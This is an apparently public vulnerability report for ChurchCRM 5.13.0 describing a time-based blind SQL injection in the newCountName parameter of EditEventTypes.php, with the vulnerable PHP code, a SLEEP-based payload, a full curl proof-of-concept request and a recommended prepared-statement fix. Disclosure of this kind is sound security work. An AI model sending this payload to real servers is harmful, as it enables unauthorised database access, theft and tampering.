Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php #7246
Description
Severity:
⚫ Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)
Authorization Required
- Administrator or a user with permission to list
event types
Description
A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.
Exploiting the SQL Injection
Affected Asset:
http://<server_ip>/EditEventTypes.php
Vulnerable Source Code:
ctid = mb_substr($_POST['Action'], 7);
$sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
RunQuery($sSQL);
} else {
switch ($_POST['Action']) {
case 'ADD':
$newCTName = $_POST['newCountName'];
$theID = $_POST['EN_tyid'];
$sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
RunQuery($sSQL);
break;Steps to Reproduce:
- Navigate to the EditEventTypes endpoint:
http://<server_ip>/EditEventTypes.php - Intercept the request using a tool like Burp Suite or manually craft a request.
- Modify the
newCountNameparameter with the following SQL Injection payload:4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS
- Observe the response time delay, indicating that SQL Injection is possible.
Proof of Concept (PoC):
Exploiting Time-Based Blind SQL Injection
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
-H $'Referer: http://<server_ip>/EditEventTypes.php' \
-H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
-H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
-b $'<CRM-Cookie>' \
--data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
$'http://<server_ip>/EditEventTypes.php'Observed Response:
- The request results in a 5-second delay, confirming the SQL Injection vulnerability.
Impact:
- Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and admin tokens.
- Database Manipulation: Attackers can modify, delete, or corrupt important data.
- Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
Recommended Fix:
- Use prepared statements (parameterized queries) to prevent SQL Injection. Example:
$stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)"); $stmt->execute([$theID, $newCTName]);
- Implement input validation to reject dangerous characters.
- Apply principle of least privilege to database users to limit damage from SQL Injection.
- Adding Data Type Assignment in PHP for the
newCountNamevariable. E.g. if it is a name, change it toInt
Environment:
- Application: ChurchCRM 5.13.0
- Tested on: Provided Docker in release